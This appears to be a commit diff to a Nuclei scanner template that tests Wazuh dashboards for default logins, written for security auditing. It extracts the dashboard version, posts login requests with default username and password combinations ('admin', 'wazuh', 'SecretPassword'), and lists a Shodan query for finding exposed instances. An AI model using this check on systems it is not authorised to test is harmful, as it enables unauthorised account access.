commit
1ae53f6235
|
@ -2,33 +2,45 @@ id: wazuh-default-login
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Wazuh - Default Login
|
name: Wazuh - Default Login
|
||||||
author: theamanrawat
|
author: theamanrawat,denandz,PulseSecurity.co.nz
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
|
Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
|
||||||
reference:
|
reference:
|
||||||
- https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
|
- https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
|
||||||
- https://wazuh.com
|
- https://wazuh.com
|
||||||
|
- https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 4
|
max-request: 6
|
||||||
shodan-query: title:"Wazuh"
|
shodan-query: title:"Wazuh"
|
||||||
tags: wazuh,default-login
|
tags: wazuh,default-login
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/app/login"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: osd
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
regex:
|
||||||
|
- '"version":"([0-9.]+)"'
|
||||||
|
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
|
||||||
GET /app/login?nextUrl=%2Fapp%2Fwazuh HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
- |
|
- |
|
||||||
POST /auth/login HTTP/1.1
|
POST /auth/login HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Osd-Version: {{osd}}
|
Osd-Version: {{osd}}
|
||||||
|
osd-xsrf: osd-fetch
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
|
||||||
{"username":"{{username}}","password":"{{password}}"}
|
{"username":"{{username}}","password":"{{password}}"}
|
||||||
|
|
||||||
attack: pitchfork
|
attack: clusterbomb
|
||||||
payloads:
|
payloads:
|
||||||
username:
|
username:
|
||||||
- "admin"
|
- "admin"
|
||||||
|
@ -36,6 +48,7 @@ http:
|
||||||
password:
|
password:
|
||||||
- "admin"
|
- "admin"
|
||||||
- "wazuh"
|
- "wazuh"
|
||||||
|
- "SecretPassword"
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -56,13 +69,3 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
extractors:
|
|
||||||
- type: regex
|
|
||||||
name: osd
|
|
||||||
group: 1
|
|
||||||
regex:
|
|
||||||
- '"version":"([0-9.]+)"'
|
|
||||||
internal: true
|
|
||||||
|
|
||||||
# digest: 4b0a00483046022100de2c876067d0aa43fb62771bff3c3adea76873a9f0982f98856a1ed321b58d48022100a60ef9271fd209ecadc68b365c82e4176cd78fe24526dcbe7a8cd8772b0337cf:922c64590222798bb761d5b6d8e72950
|
|
||||||
|
|
Loading…
Reference in New Issue